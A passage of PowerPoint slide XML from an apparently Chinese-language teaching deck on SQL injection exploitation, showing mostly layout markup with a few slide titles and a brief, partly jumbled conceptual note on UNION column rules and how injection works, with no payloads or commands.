                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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pc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2531B153-C346-4B5F-9F15-E255D8568A5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404892" y="1201756"/>
              <a:ext cx="3448463" cy="708964"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形: 圆角 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591774D6-0D2E-4924-8A2A-C05E7AFCEB25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4133956" y="2281840"/>
            <a:ext cx="6623742" cy="2625438"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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4000" b="1" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0704B6F-3385-4EC7-86DC-67C9A71CE192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918039" y="1727842"/>
            <a:ext cx="1355475" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>04.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="475574"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="椭圆 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4161C916-944D-4763-8B84-9D12DFF581A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10513692" y="1714500"/>
            <a:ext cx="787540" cy="787540"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="椭圆 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B017DFD5-6ED9-4471-ABB5-07DB969177C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3665420" y="5227057"/>
            <a:ext cx="343873" cy="343873"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF4E3DC-0036-4E55-8BCA-1B5E78FA2CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947448" y="3288454"/>
            <a:ext cx="4970991" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2136215476"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428990" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="701566"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E18CD03-08D8-45DC-BEE7-56F06037A00C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625059" y="1493381"/>
            <a:ext cx="3375441" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入可以做什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE663B91-7818-4421-8DB7-24ED1607974D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="549141" y="2209623"/>
            <a:ext cx="11401630" cy="3154996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2639482428"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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35DBBDC7-4137-4E62-8E8E-511EF2EA9383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE33A0B2-9575-4FD7-9EF8-9B8416576EFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056894C6-E7D6-4D30-B4F5-E11C54893A16}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8954839D-822E-432C-ABF8-5EE9B80CE9A6}"/>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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B17FA1F-3E11-48D1-BD36-559DE6F2D38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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF34843-E312-40D6-966C-3D17A34E60A9}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E251E78C-FF33-4EA5-8ECB-BA7F83972A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1434302" y="793451"/>
            <a:ext cx="1972090" cy="2645659"/>
            <a:chOff x="1404892" y="1201756"/>
            <a:chExt cx="3448463" cy="4626288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC92771-E232-46FD-9576-C1A00DCA270E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404892" y="1780764"/>
              <a:ext cx="3448463" cy="4047280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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pc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2531B153-C346-4B5F-9F15-E255D8568A5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404892" y="1201756"/>
              <a:ext cx="3448463" cy="708964"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形: 圆角 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591774D6-0D2E-4924-8A2A-C05E7AFCEB25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4133956" y="2281840"/>
            <a:ext cx="6623742" cy="2625438"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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4000" b="1" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0704B6F-3385-4EC7-86DC-67C9A71CE192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918039" y="1727842"/>
